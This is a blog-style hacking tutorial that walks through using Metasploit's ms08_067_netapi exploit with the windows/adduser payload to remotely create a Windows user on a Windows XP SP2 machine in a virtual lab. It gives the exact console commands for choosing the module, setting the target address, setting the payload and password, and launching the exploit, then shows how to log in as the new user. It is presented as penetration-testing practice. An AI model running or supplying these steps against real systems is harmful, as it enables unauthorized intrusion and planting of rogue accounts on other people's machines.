Metasploit/Exploit #2 : How to Hack and Remotely create a new Windows User .





   In this Tutorial, I'm going to share on How to Hack and Remotely create a new Windows User . Please check my other tutorial on How to set a Virtual Lab for hacking and penetration testing . My targeted machine is running on Windows XP Service Pack 2 .


Steps

  1. Search system known vulnerability exploit.
  2. Set the Payload.
  3. Exploit.
  4. Check Windows XP login panel.
Steps Details.


1) Search system known vulnerability exploit.



1.1) Search for Module called"netapi" .
netapi
1.2) Use "netapi" module to launch an exploit .
copy the exploit name


Type  "use exploit/windows/smb/ms08_067_netapi"




Display existing configuration by typing "show options"

show options

1.3) Set the RHOST (Remote Host) IP address . In this tutorial,my targeted machine IP address is 10.10.10.4 .

Type  "set RHOST 10.10.10.4"
Set the targeted IP address 


2) Set the Payload



2.1) Next , you need to setup the Payload.Payload will execute task once we break in the system. The payload that we want to use is called windows/adduser .This payload will create a single user in the compromised system .

Type "set PAYLOAD windows/adduser
This payload will create a user in Windows 
 2.2) You can also set the Username and Password for the new Windows user in the payload settings.To display the settings,

Type "show options"
windows/adduser
"PASS" is where you set the Password and "USER" is where you set the Username .


  In this example, I will use the existing username which is "metasploit"and I will change my current password  to "Metasploit1234" .To change the password,


Type "set PASS Metasploit1234
settings windows Password
3. Exploit.


3.1) Type "show options"  to display configured exploit and payload . To exploit the Windows system,

Type "exploit"  

exploit
Once it finished executed,  the command prompt will notify that "Exploit completed, but no session was created". 
This is because the payload that we set will only execute one job .Since i'm running in My Virtual Lab , I can check my Windows system in my virtualbox.



4. Check Windows XP login panel.


4.1)Log off your current terminal by going to  "Start>Log Off " .

Log off windows




3.2 ) Choose to switch the Windows User .

Switch User


3.4) Choose your new user . In this example, my new user is "metasploit" with "Metasploit1234" as it's password.

choose your new user and key in the password
A new windows user was created from Metasploit !
New windows user created



Previous
Next Post »